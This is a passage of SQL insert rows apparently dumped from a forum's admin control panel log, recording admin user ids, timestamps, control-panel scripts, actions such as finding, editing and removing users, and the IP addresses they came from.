(2127, 100, 1456231020, 'user.php', 'find', '', '188.114.103.247'),
(2128, 100, 1456231030, 'user.php', 'find', '', '188.114.103.247'),
(2129, 100, 1456231039, 'user.php', 'find', '', '188.114.103.247'),
(2130, 100, 1456232638, 'user.php', 'find', '', '188.114.103.247'),
(2131, 100, 1456232664, 'user.php', 'edit', '', '188.114.103.247'),
(2132, 100, 1456232689, 'user.php', 'edit', '', '188.114.103.247'),
(2133, 100, 1456232804, 'user.php', 'update', '', '188.114.103.247'),
(2134, 100, 1456232820, 'user.php', 'find', '', '188.114.103.247'),
(2135, 100, 1456232873, 'notice.php', 'modify', '', '188.114.103.247'),
(2136, 100, 1456232922, 'notice.php', 'add', '', '188.114.103.247'),
(2137, 100, 1456232962, 'forum.php', 'modify', '', '188.114.103.247'),
(2138, 100, 1456232988, 'forumpermission.php', 'modify', '', '188.114.103.247'),
(2139, 100, 1456232995, 'resources.php', '', '', '188.114.103.247'),
(2140, 100, 1456233013, 'banning.php', 'banuser', '', '188.114.103.247'),
(2141, 100, 1456233024, 'user.php', 'modify', '', '188.114.103.247'),
(2142, 100, 1456233040, 'user.php', 'prune', '', '188.114.103.247'),
(2143, 100, 1456233045, 'banning.php', 'modify', '', '188.114.103.247'),
(2144, 100, 1456233059, 'user.php', 'add', '', '188.114.103.247'),
(2145, 100, 1456233061, 'user.php', 'modify', '', '188.114.103.247'),
(2146, 100, 1456233065, 'user.php', 'find', '', '188.114.103.247'),
(2147, 100, 1456233100, 'user.php', 'remove', 'user id = 160', '188.114.103.247'),
(2148, 100, 1456233107, 'user.php', 'kill', 'user id = 160', '188.114.103.247'),
(2149, 100, 1456233109, 'user.php', 'modify', '', '188.114.103.247'),
(2150, 100, 1456233111, 'user.php', 'find', '', '188.114.103.247'),
(2151, 100, 1456233128, 'user.php', 'find', '', '188.114.103.247'),
(2152, 100, 1456233164, 'user.php', 'find', '', '188.114.103.247'),
(2153, 100, 1456233171, 'user.php', 'find', '', '188.114.103.247'),
(2154, 100, 1456233216, 'user.php', 'find', '', '188.114.103.247'),
(2155, 100, 1456233226, 'user.php', 'remove', 'user id = 249', '188.114.103.247'),
(2156, 100, 1456233228, 'user.php', 'kill', 'user id = 249', '188.114.103.247'),
(2157, 100, 1456233229, 'user.php', 'modify', '', '188.114.103.247'),
(2158, 100, 1456233231, 'user.php', 'find', '', '188.114.103.247'),
(2159, 100, 1456233245, 'user.php', 'find', '', '188.114.103.247'),
(2160, 100, 1456233247, 'user.php', 'find', '', '188.114.103.247'),
(2161, 100, 1456233249, 'user.php', 'find', '', '188.114.103.247'),
(2162, 100, 1456233900, 'user.php', 'find', '', '188.114.103.247'),
(2163, 100, 1456233917, 'user.php', 'find', '', '188.114.103.247'),
(2164, 100, 1456233932, 'user.php', 'find', '', '188.114.103.247'),
(2165, 100, 1456233946, 'user.php', 'find', '', '188.114.103.247'),
(2166, 100, 1456234066, 'user.php', 'find', '', '188.114.103.247'),
(2167, 100, 1456234079, 'user.php', 'find', '', '188.114.103.247'),
(2168, 100, 1456234086, 'user.php', 'find', '', '188.114.103.247'),
(2169, 100, 1456234095, 'user.php', 'remove', 'user id = 168', '188.114.103.247'),
(2170, 100, 1456234327, 'attachment.php', 'types', '', '162.158.88.10'),
(2171, 100, 1456234335, 'attachment.php', 'updatetype', '', '162.158.88.10'),
(2172, 100, 1456234817, 'attachment.php', 'updatetype', '', '162.158.88.10'),
(2173, 100, 1456234842, 'attachment.php', 'doupdatetype', '', '162.158.88.10'),
(2174, 100, 1456234843, 'attachment.php', 'types', '', '162.158.88.10'),
(2175, 100, 1456234856, 'moderate.php', 'posts', '', '162.158.88.10'),
(2176, 1, 1456238078, 'options.php', '', '', '141.101.104.54'),
(2177, 1, 1456238082, 'template.php', 'modify', '', '141.101.104.54'),
(2178, 1, 1456238093, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2179, 1, 1456238175, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2180, 1, 1456238178, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2181, 1, 1456238189, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2182, 1, 1456238248, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2183, 1, 1456238259, 'forum.php', 'modify', '', '141.101.104.54'),
(2184, 1, 1456238272, 'forum.php', 'edit', 'forum id = 32', '141.101.104.54'),
(2185, 1, 1456238289, 'template.php', 'modify', '', '141.101.104.54'),
(2186, 1, 1456238292, 'template.php', 'search', '', '141.101.104.54'),
(2187, 1, 1456238302, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2188, 1, 1456238314, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2189, 1, 1456238322, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2190, 1, 1456238333, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2191, 1, 1456238339, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2192, 1, 1456238343, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2193, 1, 1456238345, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2194, 1, 1456238349, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2195, 1, 1456238352, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2196, 1, 1456238354, 'template.php', 'replace', 'style id = -1', '141.101.104.54'),
(2197, 1, 1456238359, 'template.php', 'search', '', '141.101.104.54'),
(2198, 1, 1456238363, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2199, 1, 1456238375, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2200, 1, 1456238380, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2201, 1, 1456238387, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2202, 1, 1456238395, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2203, 1, 1456238399, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2204, 1, 1456238404, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2205, 1, 1456238406, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2206, 1, 1456238407, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2207, 1, 1456238408, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2208, 1, 1456238411, 'template.php', 'replace', 'style id = 2', '141.101.104.54'),
(2209, 1, 1456238418, 'template.php', 'modify', '', '141.101.104.54'),
(2210, 1, 1456238426, 'template.php', 'add', 'style id = 2', '141.101.104.54'),
(2211, 1, 1456238432, 'template.php', 'modify', '', '141.101.104.54'),
(2212, 1, 1456238470, 'template.php', 'editstyle', 'style id = 2', '141.101.104.54'),
(2213, 1, 1456238481, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2214, 1, 1456238500, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2215, 1, 1456238517, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2216, 1, 1456238546, 'thread.php', 'prune', '', '141.101.104.54'),
(2217, 1, 1456238552, 'prefix.php', '', '', '141.101.104.54'),
(2218, 1, 1456238558, 'prefix.php', 'addset', '', '141.101.104.54'),
(2219, 1, 1456238574, 'image.php', 'modify', 'Post Icons', '141.101.104.54'),
(2220, 1, 1456238576, 'image.php', 'viewimages', 'Post Icons', '141.101.104.54'),
(2221, 1, 1456238586, 'image.php', 'displayorder', 'Post Icons', '141.101.104.54'),
(2222, 1, 1456238601, 'image.php', 'modify', 'Smilies', '141.101.104.54'),
(2223, 1, 1456238603, 'image.php', 'viewimages', 'Smilies', '141.101.104.54'),
(2224, 1, 1456238609, 'bbcode.php', 'modify', '', '141.101.104.54'),
(2225, 1, 1456238625, 'forum.php', 'modify', '', '141.101.104.54'),
(2226, 1, 1456238635, 'forum.php', 'podcast', 'forum id = 32', '141.101.104.54'),
(2227, 1, 1456238656, 'forum.php', 'edit', 'forum id = 32', '141.101.104.54'),
(2228, 1, 1456238671, 'forum.php', 'update', 'forum id = 32', '141.101.104.54'),
(2229, 1, 1456238672, 'forum.php', 'modify', 'forum id = 32', '141.101.104.54'),
(2230, 1, 1456238690, 'forum.php', 'edit', 'forum id = 36', '141.101.104.54'),
(2231, 1, 1456238694, 'forum.php', 'update', 'forum id = 36', '141.101.104.54'),
(2232, 1, 1456238695, 'forum.php', 'modify', 'forum id = 36', '141.101.104.54'),
(2233, 1, 1456238698, 'forum.php', 'edit', 'forum id = 37', '141.101.104.54'),
(2234, 1, 1456238702, 'forum.php', 'update', 'forum id = 37', '141.101.104.54'),
(2235, 1, 1456238703, 'forum.php', 'modify', 'forum id = 37', '141.101.104.54'),
(2236, 1, 1456238706, 'forum.php', 'edit', 'forum id = 17', '141.101.104.54'),
(2237, 1, 1456238748, 'forum.php', 'edit', 'forum id = 38', '141.101.104.54'),
(2238, 1, 1456238753, 'forum.php', 'update', 'forum id = 38', '141.101.104.54'),
(2239, 1, 1456238757, 'forum.php', 'modify', 'forum id = 38', '141.101.104.54'),
(2240, 1, 1456238816, 'template.php', 'modify', '', '141.101.104.54'),
(2241, 1, 1456238818, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2242, 1, 1456238871, 'css.php', 'update', 'style id = 2', '141.101.104.54'),
(2243, 1, 1456238872, 'css.php', 'edit', 'style id = 2', '141.101.104.54'),
(2244, 1, 1456243764, 'options.php', '', '', '141.101.104.54'),
(2245, 1, 1456243774, 'options.php', 'options', '', '141.101.104.54'),
(2246, 1, 1456243800, 'options.php', 'options', '', '141.101.104.54'),
(2247, 1, 1456243837, 'options.php', 'options', '', '141.101.104.54'),
(2248, 1, 1456243847, 'options.php', 'options', '', '141.101.104.54'),
(2249, 1, 1456243880, 'options.php', 'options', '', '141.101.104.54'),
(2250, 1, 1456243927, 'options.php', 'options', '', '141.101.104.54'),
(2251, 1, 1456243980, 'options.php', 'options', '', '141.101.104.54'),
(2252, 1, 1456243988, 'options.php', 'options', '', '141.101.104.54'),
(2253, 1, 1456244006, 'options.php', 'options', '', '141.101.104.54'),
(2254, 1, 1456244027, 'options.php', 'searchtype', '', '141.101.104.54'),
(2255, 1, 1456244055, 'admininfraction.php', 'modify', '', '141.101.104.54'),
(2256, 1, 1456244061, 'profilefield.php', 'modify', '', '141.101.104.54'),
(2257, 1, 1456244081, 'profilefield.php', 'modifycats', '', '141.101.104.54'),
(2258, 1, 1456244099, 'admininfraction.php', 'modify', '', '141.101.104.54'),
(2259, 1, 1456244108, 'usertools.php', 'doips', '', '141.101.104.54'),
(2260, 1, 1456244114, 'user.php', 'add', '', '141.101.104.54'),
(2261, 1, 1456244114, 'user.php', 'modify', '', '141.101.104.54'),
(2262, 1, 1456244118, 'user.php', 'find', '', '141.101.104.54'),
(2263, 1, 1456244157, 'user.php', 'moderate', '', '141.101.104.54'),
(2264, 1, 1456244169, 'announcement.php', 'modify', '', '141.101.104.54'),
(2265, 1, 1456244495, 'usertools.php', 'pmstats', '', '141.101.104.54'),
(2266, 1, 1456244495, 'usertools.php', 'pmstats', '', '141.101.104.54'),
(2267, 1, 1456244505, 'usertools.php', 'doips', '', '141.101.104.54'),
(2268, 1, 1456244530, 'admininfraction.php', 'modify', '', '141.101.104.54'),
(2269, 1, 1456244535, 'profilefield.php', 'modify', '', '141.101.104.54'),
(2270, 100, 1456594900, 'user.php', 'add', '', '188.114.103.246'),
(2271, 100, 1456594904, 'user.php', 'modify', '', '188.114.103.246'),
(2272, 100, 1456594906, 'user.php', 'find', '', '188.114.103.246'),
(2273, 100, 1456594943, 'user.php', 'edit', 'user id = 383', '188.114.103.246'),
(2274, 100, 1456594990, 'user.php', 'update', 'user id = 383', '188.114.103.246'),
(2275, 100, 1456595005, 'user.php', 'update', 'user id = 383', '162.158.89.36'),
(2276, 100, 1456595007, 'user.php', 'modify', 'user id = 383', '162.158.89.36'),
(2277, 100, 1456751468, 'user.php', 'add', '', '141.101.81.20'),
(2278, 100, 1456751485, 'user.php', 'update', '', '141.101.81.20'),
(2279, 100, 1456751487, 'user.php', 'modify', 'user id = 385', '141.101.81.20'),
(2280, 100, 1456752688, 'user.php', 'edit', 'user id = 385', '141.101.81.20'),
(2281, 1, 1456754900, 'user.php', 'modify', '', '162.158.89.37'),
(2282, 1, 1456754902, 'user.php', 'find', '', '162.158.89.37'),
(2283, 1, 1456754909, 'user.php', 'find', '', '162.158.89.37'),
(2284, 1, 1456754918, 'user.php', 'find', '', '162.158.89.37'),
(2285, 1, 1456754921, 'user.php', 'find', '', '162.158.89.37'),
(2286, 1, 1456754924, 'user.php', 'find', '', '162.158.89.37'),
(2287, 1, 1456754942, 'user.php', 'find', '', '162.158.89.37'),
(2288, 1, 1456754947, 'user.php', 'find', '', '162.158.89.37'),
(2289, 1, 1456754949, 'user.php', 'find', '', '162.158.89.37'),
(2290, 1, 1456754954, 'user.php', 'find', '', '162.158.89.37'),
(2291, 1, 1456754959, 'user.php', 'find', '', '162.158.89.37'),
(2292, 1, 1456754961, 'user.php', 'find', '', '162.158.89.37'),
(2293, 1, 1456754964, 'user.php', 'find', '', '162.158.89.37'),
(2294, 1, 1456754974, 'user.php', 'find', '', '162.158.89.37'),
(2295, 1, 1456754979, 'user.php', 'find', '', '162.158.89.37'),
(2296, 1, 1456826199, 'user.php', 'modify', '', '162.158.89.37'),
(2297, 1, 1456826200, 'user.php', 'find', '', '162.158.89.37'),
(2298, 1, 1456826203, 'user.php', 'find', '', '162.158.89.37'),
(2299, 1, 1456826204, 'user.php', 'find', '', '162.158.89.37'),
(2300, 1, 1456826207, 'user.php', 'find', '', '162.158.89.37'),
(2301, 1, 1456826224, 'user.php', 'find', '', '162.158.89.37'),
(2302, 1, 1456826225, 'user.php', 'find', '', '162.158.89.37'),
(2303, 1, 1456826226, 'user.php', 'find', '', '162.158.89.37'),
(2304, 1, 1456826227, 'user.php', 'find', '', '162.158.89.37'),
(2305, 1, 1456826228, 'user.php', 'find', '', '162.158.89.37'),
(2306, 1, 1456826228, 'user.php', 'find', '', '162.158.89.37'),
(2307, 1, 1456826229, 'user.php', 'find', '', '162.158.89.37'),
(2308, 1, 1456826231, 'user.php', 'find', '', '162.158.89.37'),
(2309, 1, 1456826237, 'user.php', 'remove', 'user id = 385', '162.158.89.37'),
(2310, 1, 1456826240, 'user.php', 'kill', 'user id = 385', '162.158.89.37'),
(2311, 1, 1456826241, 'user.php', 'modify', '', '162.158.89.37'),
(2312, 1, 1456842633, 'user.php', 'modify', '', '162.158.89.37'),
(2313, 1, 1456842635, 'user.php', 'find', '', '162.158.89.37'),
(2314, 1, 1456842637, 'user.php', 'find', '', '162.158.89.37'),
(2315, 1, 1456842638, 'user.php', 'find', '', '162.158.89.37'),
(2316, 1, 1456842639, 'user.php', 'find', '', '162.158.89.37'),
(2317, 1, 1456842640, 'user.php', 'find', '', '162.158.89.37'),
(2318, 1, 1456842641, 'user.php', 'find', '', '162.158.89.37'),
(2319, 1, 1456842642, 'user.php', 'find', '', '162.158.89.37'),
(2320, 1, 1456842643, 'user.php', 'find', '', '162.158.89.37'),
(2321, 1, 1456842644, 'user.php', 'find', '', '162.158.89.37'),
(2322, 1, 1456842644, 'user.php', 'find', '', '162.158.89.37'),
(2323, 1, 1456842646, 'user.php', 'find', '', '162.158.89.37'),
(2324, 1, 1456842651, 'user.php', 'edit', '', '162.158.89.37'),
(2325, 1, 1456842669, 'user.php', 'update', '', '162.158.89.37'),
(2326, 1, 1456842671, 'user.php', 'edit', 'user id = 13', '162.158.89.37'),
(2327, 1, 1456842688, 'user.php', 'modify', '', '162.158.89.37'),
(2328, 1, 1456842689, 'usertools.php', 'doips', '', '162.158.89.37'),
(2329, 1, 1456842698, 'usertools.php', 'doips', '', '162.158.89.37'),
(2330, 1, 1456842707, 'usertools.php', 'doips', '', '162.158.89.37'),
(2331, 1, 1456842731, 'usertools.php', 'doips', '', '162.158.89.37'),
(2332, 1, 1456842740, 'usertools.php', 'doips', 'user id = 13', '162.158.89.37'),
(2333, 1, 1456842741, 'usertools.php', 'doips', '', '162.158.89.37'),
(2334, 1, 1456842743, 'usertools.php', 'doips', '', '162.158.89.37'),
(2335, 1, 1456842744, 'usertools.php', 'doips', '', '162.158.89.37'),
(2336, 1, 1456842746, 'usertools.php', 'doips', '', '162.158.89.37'),
(2337, 1, 1456842748, 'usertools.php', 'doips', 'user id = 13', '162.158.89.37'),
(2338, 1, 1456842749, 'usertools.php', 'doips', '', '162.158.89.37'),
(2339, 1, 1456842751, 'usertools.php', 'doips', '', '162.158.89.37'),
(2340, 1, 1456842752, 'usertools.php', 'doips', '', '162.158.89.37'),
(2341, 1, 1456842755, 'usertools.php', 'doips', '', '162.158.89.37'),
(2342, 1, 1456842757, 'usertools.php', 'doips', '', '162.158.89.37'),
(2343, 1, 1456842758, 'usertools.php', 'doips', '', '162.158.89.37'),
(2344, 1, 1456842760, 'usertools.php', 'doips', '', '162.158.89.37'),
(2345, 1, 1456842763, 'usertools.php', 'doips', '', '162.158.89.37'),
(2346, 1, 1456842764, 'usertools.php', 'doips', '', '162.158.89.37'),
(2347, 1, 1456842766, 'usertools.php', 'doips', '', '162.158.89.37'),
(2348, 1, 1456842785, 'usertools.php', 'gethost', '', '162.158.89.37'),
(2349, 1, 1456842793, 'usertools.php', 'doips', '', '162.158.89.37'),
(2350, 100, 1457137211, 'user.php', 'modify', '', '199.27.133.29'),
(2351, 100, 1457137214, 'user.php', 'find', '', '199.27.133.29'),
(2352, 100, 1457137228, 'user.php', 'find', '', '199.27.133.29'),
(2353, 100, 1457137237, 'user.php', 'find', '', '199.27.133.29'),
(2354, 100, 1457137242, 'user.php', 'find', '', '199.27.133.29'),
(2355, 100, 1457137245, 'user.php', 'find', '', '199.27.133.29'),
(2356, 100, 1457137249, 'user.php', 'find', '', '199.27.133.29'),
(2357, 100, 1457137252, 'user.php', 'find', '', '199.27.133.29'),
(2358, 100, 1457137256, 'user.php', 'find', '', '199.27.133.29'),
(2359, 100, 1457137261, 'user.php', 'find', '', '199.27.133.29'),
(2360, 100, 1457137264, 'user.php', 'find', '', '199.27.133.29'),
(2361, 100, 1457137278, 'user.php', 'edit', 'user id = 383', '199.27.133.29'),
(2362, 100, 1457137322, 'user.php', 'update', 'user id = 383', '199.27.133.29'),
(2363, 100, 1457137324, 'user.php', 'modify', 'user id = 383', '199.27.133.29'),
(2364, 100, 1457200626, 'backup.php', 'choose', '', '162.158.89.24'),
(2365, 100, 1457200677, 'help.php', 'answer', '', '162.158.89.24'),
(2366, 100, 1457201559, 'backup.php', 'choose', '', '199.27.133.29'),
(2367, 1, 1457521058, 'moderate.php', 'posts', '', '141.101.104.183'),
(2368, 1, 1457521076, 'template.php', 'modify', '', '141.101.104.183'),
(2369, 1, 1457521079, 'css.php', 'edit', 'style id = 2', '141.101.104.183'),
(2370, 1, 1457521108, 'css.php', 'update', 'style id = 2', '141.101.104.183'),
(2371, 1, 1457521110, 'css.php', 'edit', 'style id = 2', '141.101.104.183'),
(2372, 1, 1457625861, 'template.php', 'modify', '', '162.158.88.99'),
(2373, 1, 1457625864, 'css.php', 'edit', 'style id = 2', '162.158.88.99'),
(2374, 1, 1457625973, 'css.php', 'update', 'style id = 2', '162.158.88.99'),
(2375, 1, 1457625974, 'css.php', 'edit', 'style id = 2', '162.158.88.99'),
(2376, 1, 1457626032, 'css.php', 'update', 'style id = 2', '162.158.88.99'),
(2377, 1, 1457626033, 'css.php', 'edit', 'style id = 2', '162.158.88.99'),
(2378, 1, 1457633941, 'stats.php', 'index', '', '162.158.88.99'),
(2379, 1, 1457633945, 'stats.php', 'top', '', '162.158.88.99'),
(2380, 1, 1457633950, 'stats.php', 'activity', '', '162.158.88.99'),
(2381, 1, 1457633952, 'stats.php', 'activity', '', '162.158.88.99'),
(2382, 1, 1457633977, 'adminlog.php', 'choose', '', '162.158.88.99'),
(2383, 1, 1457634026, 'adminlog.php', 'choose', '', '162.158.88.99'),
(2384, 1, 1457634037, 'subscriptions.php', 'transactions', '', '162.158.88.99'),
(2385, 1, 1457634039, 'subscriptions.php', 'transactions', '', '162.158.88.99'),
(2386, 1, 1457634045, 'subscriptions.php', 'transactions', '', '162.158.88.99'),
(2387, 1, 1457634046, 'subscriptions.php', 'transactions', '', '162.158.88.99'),
(2388, 1, 1457955438, 'stats.php', 'index', '', '141.101.104.183'),
(2389, 1, 1457955442, 'stats.php', 'activity', '', '141.101.104.183'),
(2390, 1, 1457955445, 'stats.php', 'activity', '', '141.101.104.183'),
(2391, 1, 1458308008, 'user.php', 'modify', '', '85.105.178.242'),
(2392, 1, 1458308011, 'user.php', 'find', '', '85.105.178.242'),
(2393, 1, 1458308012, 'user.php', 'find', '', '85.105.178.242'),
(2394, 1, 1458308013, 'user.php', 'find', '', '85.105.178.242'),
(2395, 1, 1458308014, 'user.php', 'find', '', '85.105.178.242'),
(2396, 1, 1458308016, 'user.php', 'find', '', '85.105.178.242'),
(2397, 1, 1458308086, 'user.php', 'find', '', '85.105.178.242'),
(2398, 1, 1458308092, 'user.php', 'edit', 'user id = 169', '85.105.178.242'),
(2399, 1, 1458308111, 'usertools.php', 'doips', '', '85.105.178.242'),
(2400, 1, 1458308119, 'usertools.php', 'doips', '', '85.105.178.242'),
(2401, 1, 1458308240, 'admininfraction.php', 'modify', '', '85.105.178.242'),
(2402, 1, 1458308247, 'usertools.php', 'doips', '', '85.105.178.242'),
(2403, 1, 1458308367, 'usertitle.php', 'modify', '', '85.105.178.242'),
(2404, 1, 1458308508, 'user.php', 'modify', '', '85.105.178.242'),
(2405, 1, 1458308511, 'user.php', 'find', '', '85.105.178.242'),
(2406, 1, 1458308517, 'user.php', 'edit', 'user id = 1', '85.105.178.242'),
(2407, 1, 1458748825, 'user.php', 'modify', '', '85.105.178.242'),
(2408, 1, 1458748826, 'user.php', 'find', '', '85.105.178.242'),
(2409, 1, 1458748828, 'user.php', 'find', '', '85.105.178.242'),
(2410, 1, 1458748829, 'user.php', 'find', '', '85.105.178.242'),
(2411, 1, 1458748830, 'user.php', 'find', '', '85.105.178.242'),
(2412, 1, 1458748831, 'user.php', 'find', '', '85.105.178.242'),
(2413, 1, 1458748832, 'user.php', 'find', '', '85.105.178.242'),
(2414, 1, 1458748833, 'user.php', 'find', '', '85.105.178.242'),
(2415, 1, 1458748834, 'user.php', 'find', '', '85.105.178.242'),
(2416, 1, 1458748836, 'user.php', 'find', '', '85.105.178.242'),
(2417, 1, 1458748888, 'user.php', 'edit', 'user id = 283', '85.105.178.242'),
(2418, 100, 1458768878, 'backup.php', 'choose', '', '5.220.244.137'),
(2419, 100, 1458768903, 'user.php', 'modify', '', '5.220.244.137'),
(2420, 100, 1458768916, 'user.php', 'find', '', '5.220.244.137'),
(2421, 100, 1458768917, 'user.php', 'edit', 'user id = 383', '5.220.244.137'),
(2422, 100, 1458768958, 'user.php', 'update', 'user id = 383', '5.220.244.137'),
(2423, 100, 1458768960, 'user.php', 'modify', 'user id = 383', '5.220.244.137'),
(2424, 173, 1458772765, 'user.php', 'viewuser', 'user id = 173', '216.164.19.30'),
(2425, 100, 1459762944, 'user.php', 'add', '', '37.58.59.80'),
(2426, 100, 1459763029, 'user.php', 'update', '', '37.58.59.80'),
(2427, 100, 1459763031, 'user.php', 'modify', 'user id = 386', '37.58.59.80'),
(2428, 100, 1459843362, 'user.php', 'modify', '', '104.37.190.18'),
(2429, 100, 1459843369, 'user.php', 'find', '', '104.37.190.18'),
(2430, 100, 1459843370, 'user.php', 'edit', 'user id = 386', '104.37.190.18'),
(2431, 100, 1459843418, 'user.php', 'update', 'user id = 386', '104.37.190.18'),
(2432, 100, 1459843420, 'user.php', 'modify', 'user id = 386', '104.37.190.18'),
(2433, 100, 1459843426, 'adminpermissions.php', 'edit', 'user id = 386 (Spynet)', '104.37.190.18'),
(2434, 100, 1459843441, 'adminpermissions.php', 'update', 'user id = 386 (Spynet) (0 » 491516)', '104.37.190.18'),
(2435, 100, 1459843442, 'adminpermissions.php', '', '', '104.37.190.18'),
(2436, 100, 1459843459, 'user.php', 'modify', '', '104.37.190.18'),
(2437, 100, 1459843465, 'user.php', 'find', '', '104.37.190.18'),
(2438, 100, 1459843483, 'user.php', 'edit', 'user id = 174', '104.37.190.18'),
(2439, 100, 1459843491, 'user.php', 'edit', '', '104.37.190.18'),
(2440, 100, 1459843495, 'user.php', 'find', '', '104.37.190.18'),
(2441, 100, 1459843504, 'user.php', 'find', '', '104.37.190.18'),
(2442, 100, 1459843511, 'user.php', 'find', '', '104.37.190.18'),
(2443, 100, 1459843517, 'user.php', 'find', '', '104.37.190.18'),
(2444, 100, 1459843522, 'user.php', 'find', '', '104.37.190.18'),
(2445, 100, 1459843526, 'user.php', 'find', '', '104.37.190.18'),
(2446, 100, 1459843532, 'user.php', 'edit', '', '104.37.190.18'),
(2447, 100, 1459843536, 'user.php', 'edit', '', '104.37.190.18'),
(2448, 100, 1459843549, 'user.php', 'modify', '', '104.37.190.18'),
(2449, 100, 1459843555, 'user.php', 'find', '', '104.37.190.18'),
(2450, 100, 1459843556, 'user.php', 'edit', '', '104.37.190.18'),
(2451, 100, 1459843573, 'usergroup.php', 'modify', '', '104.37.190.18'),
(2452, 100, 1459843611, 'ranks.php', 'modify', '', '104.37.190.18'),
(2453, 100, 1459843623, 'user.php', 'modify', '', '104.37.190.18'),
(2454, 100, 1459843629, 'user.php', 'find', '', '104.37.190.18'),
(2455, 100, 1459843629, 'user.php', 'edit', 'user id = 386', '104.37.190.18'),
(2456, 100, 1459843637, 'user.php', 'update', 'user id = 386', '104.37.190.18'),
(2457, 100, 1459843639, 'user.php', 'modify', 'user id = 386', '104.37.190.18'),
(2458, 100, 1459843643, 'user.php', 'edit', 'user id = 386', '104.37.190.18'),
(2459, 100, 1459843673, 'announcement.php', 'modify', '', '104.37.190.18'),
(2460, 100, 1459843697, 'announcement.php', 'add', '', '104.37.190.18'),
(2461, 100, 1459843705, 'announcement.php', 'modify', '', '104.37.190.18'),
(2462, 100, 1459843708, 'announcement.php', 'add', '', '104.37.190.18'),
(2463, 100, 1459843713, 'announcement.php', 'modify', '', '104.37.190.18'),
(2464, 100, 1459843731, 'forum.php', 'modify', '', '104.37.190.18'),
(2465, 100, 1459843750, 'announcement.php', 'add', '', '104.37.190.18'),
(2466, 100, 1459843752, 'announcement.php', 'modify', '', '104.37.190.18'),
(2467, 100, 1459843753, 'announcement.php', 'modify', '', '104.37.190.18'),
(2468, 100, 1459843759, 'announcement.php', 'add', '', '104.37.190.18'),
(2469, 100, 1459843770, 'user.php', 'modify', '', '104.37.190.18'),
(2470, 100, 1459843775, 'user.php', 'find', '', '104.37.190.18'),
(2471, 100, 1459843775, 'user.php', 'edit', 'user id = 386', '104.37.190.18'),
(2472, 100, 1459843785, 'user.php', 'editaccess', 'user id = 386', '104.37.190.18'),
(2473, 100, 1459843794, 'user.php', 'updateaccess', 'user id = 386', '104.37.190.18'),
(2474, 100, 1459843796, 'user.php', 'edit', 'user id = 386', '104.37.190.18'),
(2475, 1, 1462464191, 'user.php', 'modify', '', '85.105.178.242'),
(2476, 1, 1462464193, 'user.php', 'find', '', '85.105.178.242'),
(2477, 1, 1462464197, 'user.php', 'edit', 'user id = 164', '85.105.178.242'),
(2478, 1, 1462464225, 'user.php', 'update', 'user id = 164', '85.105.178.242'),
(2479, 1, 1462464227, 'user.php', 'modify', 'user id = 164', '85.105.178.242'),
(2480, 100, 1462892146, 'user.php', 'modify', '', '94.50.7.155'),
(2481, 100, 1462892149, 'user.php', 'find', '', '94.50.7.155'),
(2482, 100, 1462892155, 'user.php', 'remove', 'user id = 164', '94.50.7.155'),
(2483, 100, 1463694602, 'user.php', 'add', '', '5.220.255.27'),
(2484, 100, 1463694655, 'user.php', 'update', '', '5.220.255.27'),
(2485, 100, 1463694657, 'user.php', 'modify', 'user id = 387', '5.220.255.27'),
(2486, 100, 1463694861, 'user.php', 'edit', 'user id = 387', '5.220.255.27'),
(2487, 100, 1463694872, 'user.php', 'update', 'user id = 387', '5.220.255.27'),
(2488, 100, 1463694874, 'user.php', 'modify', 'user id = 387', '5.220.255.27'),
(2489, 100, 1463694940, 'user.php', 'edit', 'user id = 387', '5.220.255.27'),
(2490, 100, 1463694950, 'user.php', 'update', 'user id = 387', '5.220.255.27'),
(2491, 100, 1463694951, 'user.php', 'modify', 'user id = 387', '5.220.255.27'),
(2492, 387, 1463695484, 'banning.php', 'banuser', '', '5.79.68.161'),
(2493, 100, 1463695512, 'user.php', 'edit', 'user id = 387', '5.220.255.27'),
(2494, 387, 1463695846, 'forum.php', 'modify', '', '5.79.68.161'),
(2495, 387, 1463695860, 'announcement.php', 'add', '', '5.79.68.161'),
(2496, 387, 1463696060, 'announcement.php', 'update', '', '5.79.68.161'),
(2497, 387, 1463696062, 'forum.php', '', '', '5.79.68.161'),
(2498, 387, 1463696070, 'announcement.php', 'edit', 'announcement id = 1', '5.79.68.161'),
(2499, 100, 1463696148, 'user.php', 'edit', 'user id = 173', '5.220.255.27'),
(2500, 100, 1463696159, 'user.php', 'update', 'user id = 173', '5.220.255.27'),
(2501, 100, 1463696161, 'user.php', 'modify', 'user id = 173', '5.220.255.27'),
(2502, 100, 1463696268, 'usergroup.php', 'modify', '', '5.220.255.27'),
(2503, 100, 1463696275, 'usergroup.php', 'edit', 'usergroup id = 5', '5.220.255.27'),
(2504, 100, 1463696295, 'passwordcheck.php', '', '', '5.220.255.27'),
(2505, 100, 1463696305, 'user.php', 'modify', '', '5.220.255.27'),
(2506, 100, 1463696313, 'user.php', 'find', '', '5.220.255.27'),
(2507, 100, 1463696345, 'user.php', 'edit', '', '5.220.255.27'),
(2508, 100, 1463696346, 'user.php', 'edit', 'user id = 188', '5.220.255.27'),
